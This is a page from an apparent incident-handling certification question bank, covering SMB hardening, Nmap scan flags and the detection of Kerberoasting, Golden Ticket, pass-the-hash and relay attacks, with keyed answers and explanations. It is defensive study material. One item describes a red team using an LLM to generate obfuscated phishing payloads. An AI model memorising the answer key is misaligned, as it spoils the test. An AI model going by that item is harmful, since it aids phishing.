Setting this registry value to 2 enforces the highest level of restriction by preventing anonymous users from enumerating shares or user accounts. This forces the SMB service to require authenticated sessions for all enumeration requests, thereby effectively neutralizing standard null session reconnaissance techniques often used by attackers during internal network post-exploitation.

Why this answer

Disabling anonymous access and restricting null sessions is critical for hardening SMB. By configuring the RestrictAnonymous registry key to 2, the operating system denies all anonymous users from enumerating shares, usernames, and groups. This prevents attackers from performing reconnaissance against the server, significantly reducing the attack surface by ensuring that only authenticated users can query sensitive SMB metadata during the initial stages of a lateral movement attempt.

Exam trap

Candidates often suggest disabling SMB entirely or using firewall rules, failing to recognize that the specific registry key 'RestrictAnonymous' is the standard, granular configuration to prevent null session enumeration on Windows.

136
MCQmedium

Which Nmap argument should be used to display the reason why a port is reported as 'open', 'closed', or 'filtered' in the scan results?

A.--verbose
B.--packet-trace
C.--reason
D.-d
AnswerC

The --reason flag forces Nmap to document the response or lack thereof that led to its classification of a port. This is essential for incident response, as it helps identify the underlying cause of a port status, such as distinguishing between a port being dropped by a firewall or being actively rejected.

Why this answer

The --reason flag provides deep visibility into why Nmap labeled a port in a specific way by reporting the exact packet or ICMP message that caused the determination. This is incredibly useful for incident responders, as it allows them to identify exactly which network devices (like a firewall or a specific host OS behavior) are causing traffic to be filtered or dropped during an assessment.

Exam trap

Candidates often guess 'verbose' or 'packet-trace' flags. While these provide more output, they do not specifically explain the logic behind Nmap's port status determination as clearly as the dedicated --reason flag does.

137
MCQmedium

A responder is scanning a target host and wants to determine which IP protocols (e.g., ICMP, IGMP, TCP) are supported by the target. Which Nmap scan type should be used?

A.Ping scan (-sn)
B.TCP SYN scan (-sS)
C.UDP scan (-sU)
D.IP protocol scan (-sO)
AnswerD

The -sO scan sends IP packets with various protocol numbers in the IP header to determine which IP protocols are supported by the target. It can identify support for protocols such as ICMP, IGMP, TCP, UDP, and others. This is the correct scan type for enumerating supported IP protocols.

Why this answer

The IP protocol scan (-sO) is specifically designed to determine which IP protocols are supported by a target. It sends IP packets with different protocol numbers and analyzes the responses (or lack thereof) to identify supported protocols. This makes it the correct choice for the scenario.

Exam trap

The trap here is assuming that TCP or UDP scans can reveal all IP protocols, but they only cover TCP and UDP respectively.

138
MCQhard

An incident responder notices that a local user account is performing Kerberoasting. Which event log ID should the responder examine to verify this activity?

A.Event ID 4624
B.Event ID 4769
C.Event ID 4720
D.Event ID 4688
AnswerB

Event ID 4769 is generated when a service ticket is requested in an Active Directory environment. By filtering for Kerberos encryption types, specifically weak ones like RC4 (encryption type 0x17), security analysts can identify potential Kerberoasting attempts where an attacker requests tickets to extract credentials for offline cracking.

Why this answer

Kerberoasting involves requesting service tickets for service accounts from the Key Distribution Center (KDC) to crack service account passwords offline. In Windows event logs, this activity generates a specific event when a service ticket is requested. Detecting this is essential because it is a common post-exploitation technique for lateral movement and privilege escalation, allowing attackers to compromise highly privileged service accounts without interacting with the domain controller directly.

Exam trap

Students frequently confuse Kerberoasting event IDs with ticket granting service requests or account lockout logs, failing to memorize the specific TGS-REQ event ID.

139
MCQhard

A security analyst is examining SMB traffic captured during an incident. The analyst observes a series of SMB2 Session Setup requests followed by Tree Connect requests to the IPC$ share, then attempts to access the srvsvc named pipe. The source IP is an internal workstation, and the destination is a domain controller. The workstation's user account is a standard domain user. Which of the following activities is the analyst MOST likely observing?

A.A user running a legitimate administrative script that queries the domain controller for share information.
B.A misconfigured application on the workstation attempting to access a remote file share.
C.An attacker using the workstation to enumerate domain controller shares and services via SMB.
D.An attacker performing SMB relay to escalate privileges on the domain controller.
AnswerC

The sequence of Session Setup, Tree Connect to IPC$, and access to srvsvc is classic SMB enumeration. Tools like net view or PowerShell's Get-SmbShare use srvsvc to list shares. A standard user can often perform this enumeration, making it a likely precursor to further attacks.

Why this answer

The observed traffic pattern—Session Setup, Tree Connect to IPC$, and srvsvc named pipe access—is characteristic of SMB enumeration. Attackers commonly use this technique to gather information about shares, users, and services on a target. A standard domain user can perform such enumeration if not restricted, making it a likely step in reconnaissance before lateral movement.

Exam trap

The trap here is confusing SMB enumeration with SMB relay; enumeration involves direct queries, while relay involves intercepting and forwarding authentication.

140
MCQmedium

An incident responder discovers an attacker has established persistence using a Windows 'Run' key. What is the most important first step after identifying the malicious registry entry?

A.Immediately delete the registry key to stop the persistence mechanism.
B.Capture the registry state and the associated binary file for analysis.
C.Reimage the affected workstation to ensure total eradication of the malware.
D.Change all user and service account passwords on the local system.
AnswerB

Capturing the state and the binary allows for thorough forensic analysis, such as identifying the malware's capabilities and its command-and-control infrastructure. This information is vital for scoping the incident, checking for other infected systems, and ensuring that the removal process is successful and leaves no residual malicious components behind.

Why this answer

Identifying the persistence mechanism is only the first step. Before removal, the responder must ensure that evidence is captured, as registry keys can provide valuable data about the attacker's tools and techniques. After imaging the state, the responder must safely remove the entry and then investigate how the attacker initially gained the access required to modify the registry in the first place.

Exam trap

Candidates often immediately delete the registry key to stop the persistence. This destroys forensic evidence, preventing the responder from understanding the attacker's origin and full extent of the compromise.

141
MCQmedium

Which behavior is indicative of a 'Golden Ticket' attack occurring in a Windows environment?

A.The user password is changed without authorization.
B.Unusually long ticket lifetimes or requests without an initial AS-REQ.
C.An increase in NTLM traffic across the domain.
D.The creation of a new, highly privileged domain administrator.
AnswerB

Golden tickets are forged with custom, often extremely long, lifetimes and are injected into the session without the standard Authentication Service Request (AS-REQ) phase. Observing these anomalies in Kerberos traffic is a primary indicator of a compromised domain controller or the use of forged tickets.

Why this answer

A Golden Ticket attack involves an adversary gaining access to the Krbtgt account hash, which allows them to forge TGTs (Ticket Granting Tickets) for any account. Because the ticket is forged offline and holds virtually infinite lifetime, it bypasses password changes and enables persistent, stealthy domain-wide access. Detecting this requires monitoring for abnormal TGT requests that do not correlate with legitimate authentication events, which is vital for preventing long-term domain compromise.

Exam trap

Candidates often overlook the lack of AS-REQ. They focus on the ticket itself rather than the fact that the ticket exists without a legitimate initial request to the KDC.

142
MCQhard

Which of the following is the most critical step to perform after detecting a successful IDOR exploit?

A.Restart the web server service
B.Audit access logs to assess the scope of data exposure
C.Block the attacker's IP address on the firewall
D.Rotate all user passwords in the system
AnswerB

IDOR vulnerabilities frequently allow mass data exfiltration. After detection, the priority is identifying how much data was accessed by the attacker. Analyzing access logs helps quantify the breach, allowing for an accurate impact assessment and compliance reporting, which are required when handling incidents that expose personal or sensitive organizational data.

Why this answer

The most critical step is to perform a comprehensive audit to determine the scope of unauthorized access. Since IDOR exploits are often automated, an attacker could have scraped the entire database. Identifying which user records were exposed is essential for compliance, incident reporting, and notifying affected parties.

Without a thorough impact assessment, you cannot quantify the damage or ensure the vulnerability has not been used to exfiltrate bulk sensitive data.

Exam trap

Students mistakenly prioritize shutting down the entire web server or rotating all administrator passwords immediately, rather than first determining the specific breach scope via logs.

143
MCQmedium

A red team is using an LLM to generate obfuscated payload variants for a phishing simulation. The team notices that after several iterations, the model's outputs become repetitive and less varied, degrading the simulation's realism. Which technique best restores output diversity while keeping the payloads within the agreed scope?

A.Adjust the sampling parameters by increasing temperature and top-p to broaden token selection during generation.
B.Repeat the exact same prompt multiple times and select the longest output as the final payload.
C.Switch to a smaller model with fewer parameters to force more creative generation.
D.Add a penalty for repeated tokens and lower the temperature to stabilize the output format.
AnswerA

Repetitive outputs often result from low temperature or restrictive top-p, which narrows token selection to high-probability continuations. Raising temperature and top-p broadens the sampling distribution, producing more varied phrasing and structure. This directly addresses the diversity problem while scope constraints remain enforced by the prompt and review process.

Why this answer

Output repetition usually stems from sampling settings that concentrate probability mass on a few tokens. Increasing temperature and top-p broadens the distribution, yielding more varied phrasing and structure while the prompt and review process still enforce scope. Repeating prompts, using smaller models, or lowering temperature with a repetition penalty do not address the sampling cause and can worsen the lack of diversity.

Exam trap

The trap here is assuming that a repetition penalty or a smaller model restores diversity, when the actual cause is overly restrictive sampling parameters that only temperature and top-p adjustments correct.

144
Multi-Selecthard

An incident responder is validating the perimeter firewall ruleset by scanning from an external vantage point. The team wants to confirm which TCP ports are reachable through the firewall and also determine whether UDP services are exposed. Which TWO Nmap scan techniques should the responder combine to accomplish this? (Choose two.)

Select 2 answers
A.UDP scan (-sU)
B.TCP SYN scan (-sS)
C.FIN scan (-sF)
D.TCP connect scan (-sT)
E.Idle scan (-sI)
AnswersA, B

A UDP scan sends UDP payloads and interprets ICMP port-unreachable messages or application responses to classify UDP ports. Because the team also wants to know whether UDP services are exposed, -sU is required; without it, no UDP probing occurs and the firewall's UDP rules cannot be validated from the external vantage point.

Why this answer

Validating a perimeter ruleset for both protocols requires a TCP scan and a UDP scan. The TCP SYN scan is the standard, efficient way to determine which TCP ports the firewall permits, while the UDP scan is the only Nmap technique that probes UDP ports and interprets ICMP unreachable responses or service replies to classify them. Together they cover the TCP and UDP rule sets the team wants to verify.

Exam trap

The trap here is choosing multiple TCP scan types, such as SYN and connect or FIN, when the requirement explicitly includes UDP exposure that only a UDP scan can address.

145
Multi-Selectmedium

Which TWO of the following are primary security risks associated with the SMBv1 protocol in a modern Windows environment?

Select 2 answers
A.Inability to support Kerberos authentication
B.Susceptibility to remote code execution via EternalBlue
C.Lack of support for SMB message signing
D.Increased risk of man-in-the-middle and relay attacks
E.Incompatibility with NTFS permissions
AnswersB, D

SMBv1 was the vector for the infamous EternalBlue exploit, which allowed attackers to execute code remotely on vulnerable systems. This vulnerability remains a primary reason why security professionals advocate for the total removal of SMBv1, as it provides a reliable path for attackers to gain administrative control over systems.

Why this answer

SMBv1 is an archaic protocol that lacks modern security features, making it a critical target for attackers. Its primary risks include vulnerability to well-known remote code execution exploits like EternalBlue and its susceptibility to man-in-the-middle attacks due to weak or absent integrity checks. Understanding these risks is vital for incident handlers to prioritize the deprecation of legacy protocols, which are often the primary entry points for ransomware and lateral movement.

Exam trap

Candidates often focus on data loss or unauthorized access, missing the specific technical vulnerabilities like RCE (EternalBlue) and MITM that make SMBv1 uniquely dangerous compared to newer protocol versions.

146
Multi-Selectmedium

An incident responder is analyzing a suspected process injection on a Windows host. Which two artifacts most reliably indicate that a remote thread was injected into a legitimate process? (Choose two.)

Select 2 answers
A.A memory region with PAGE_EXECUTE_READWRITE permissions that is not backed by a file on disk
B.A thread start address that resides outside the memory range of any loaded module
C.Event ID 4688 showing the creation of a new process with a suspicious command line
D.An increase in DNS query volume from the host
E.A high number of failed logon attempts in the Security event log
AnswersA, B

Injected code frequently resides in memory allocated with execute-read-write permissions and no corresponding file on disk. Legitimate modules are typically backed by files and have more restrictive permissions. An unbacked RWX region is a classic indicator of code injection, making it a reliable artifact to examine during memory forensics.

Why this answer

Remote thread injection leaves memory artifacts: a thread whose start address is outside any loaded module, and an unbacked memory region with execute-read-write permissions. These indicate code executing from dynamically allocated memory rather than a legitimate DLL or EXE. Process creation events, failed logons, and DNS volume are unrelated to thread injection and do not directly evidence it.

Exam trap

The trap here is conflating process creation monitoring with thread-level memory forensics, which are distinct data sources for detecting injection.

147
Multi-Selectmedium

An incident handler is investigating a suspected SMB relay attack at a financial services company. The team has captured traffic showing NTLM authentication being forwarded from a compromised workstation to a domain controller. Which two of the following controls would most directly mitigate this specific relay technique? (Choose two.)

Select 2 answers
A.Disable NTLM authentication for all domain accounts and require Kerberos where possible.
B.Enforce SMB signing on all SMB servers and clients via Group Policy.
C.Enable SMB1 on all servers to improve compatibility with legacy clients.
D.Require long, complex passwords for all domain users.
E.Deploy an intrusion detection system signature that alerts on SMB Tree Connect requests.
AnswersA, B

NTLM relay depends on NTLM challenge-response authentication being accepted. If NTLM is disabled and Kerberos is required, a captured NTLM exchange cannot be reused because the service will not accept NTLM credentials. This removes the underlying authentication mechanism the attacker relies on. It is a strong, direct mitigation for relay, though it requires careful compatibility planning.

Why this answer

NTLM relay succeeds because an attacker can forward a captured NTLM exchange to another service that accepts NTLM. Requiring SMB signing binds messages to the session and invalidates relayed authentication, while disabling NTLM and requiring Kerberos removes the reusable credential exchange entirely. Together these controls directly break the relay path, whereas password complexity, SMB1 enablement, and detection-only measures do not prevent the forwarded authentication from being accepted.

Exam trap

The trap here is choosing detection or password-hardening measures that improve visibility or credential strength but do not stop a real-time NTLM relay from being accepted by the target service.

148
MCQmedium

During an incident response engagement, you review Windows Security event logs and observe a series of 4624 logons with Logon Type 3 originating from a single workstation. The account name is the computer account of a server, and the source workstation is a user's desktop that normally never authenticates to the target server. Which post-exploitation technique is most consistent with this pattern?

A.Kerberoasting of the server's service account
B.Pass-the-Hash using the machine account hash to authenticate laterally
C.Golden Ticket creation using the KRBTGT hash
D.DCSync replication of directory credentials
AnswerB

Pass-the-Hash reuses an NTLM hash to authenticate without knowing the plaintext password. Machine accounts can be abused the same way. A Logon Type 3 (network) from an unexpected workstation using a server's machine account strongly indicates credential reuse of a captured machine hash for lateral movement. This aligns with the observed anomaly.

Why this answer

Pass-the-Hash allows an adversary to authenticate using a captured NTLM hash, and machine account hashes are equally usable. A Type 3 network logon claiming to be a server's machine account but originating from an unrelated workstation is a classic lateral movement signature. Kerberoasting, Golden Ticket, and DCSync leave different artifacts such as 4769, 4768, or 4662 events, not this logon pattern.

Exam trap

The trap here is assuming any 4624 Type 3 event is benign file-share access rather than recognizing the mismatch between the claimed machine account and the actual source workstation.

149
MCQeasy

A junior incident handler is reviewing an alert from an AI-powered email security gateway that flagged a message as a likely AI-generated phishing attempt. The gateway's model outputs a confidence score but no explanation. The handler wants to gather corroborating evidence from the message headers and body to support the classification before escalating. Which artifact would best help the handler verify that the message was generated or augmented by an AI tool?

A.The sender's display name and the reply-to address mismatch.
B.The SPF and DKIM authentication results in the headers.
C.The Received header chain showing the message's relay path.
D.The message body's writing style and any embedded AI watermark or metadata.
AnswerD

AI-generated text often exhibits consistent stylistic patterns, and some providers embed watermarks or metadata in generated content. Examining the body for unnatural uniformity, repeated phrasing, or embedded markers can corroborate the gateway's classification. This is the most direct artifact for validating that the content itself was AI-generated, which is exactly what the handler needs before escalating the alert.

Why this answer

To corroborate an AI-generation classification, the handler should look at the content itself, since AI-written text often shows distinctive stylistic uniformity and may carry watermarks or metadata. Header-based artifacts like SPF, DKIM, and Received chains address origin and authentication, not authorship. Focusing on the body's style and embedded markers directly supports or refutes the gateway's model output before escalation.

Exam trap

The trap here is conflating phishing indicators like SPF failures or reply-to mismatches with evidence of AI authorship, when those address origin and spoofing instead.

150
MCQmedium

Why is it dangerous to leave port 445 open to the public internet on a Windows server?

A.It enables legitimate remote file access for all employees.
B.It increases the attack surface for remote exploitation and credential brute-forcing.
C.It forces the server to use SMBv1, which is faster for internet traffic.
D.It prevents the server from using internal authentication protocols.
AnswerB

Publicly exposing SMB makes the server a target for automated scanning and exploitation. Attackers can attempt to brute-force usernames and passwords or use known exploits to gain unauthorized access. Given the history of SMB vulnerabilities, this is an extremely high-risk practice that invites compromise from global threat actors.

Why this answer

Exposing port 445 to the internet allows any attacker globally to attempt to connect to the server's SMB service. SMB was never designed for internet exposure and contains numerous vulnerabilities that can be exploited remotely. Attackers use this access to perform reconnaissance, brute-force weak credentials, and deploy ransomware by exploiting unpatched vulnerabilities, making it one of the most critical firewall misconfigurations for any organization to avoid.

Exam trap

Students often assume port 445 exposure is only dangerous because of data interception, overlooking the severe risk of direct remote code execution and brute-forcing.

Page 1

Page 2 of 5

Page 3

All pages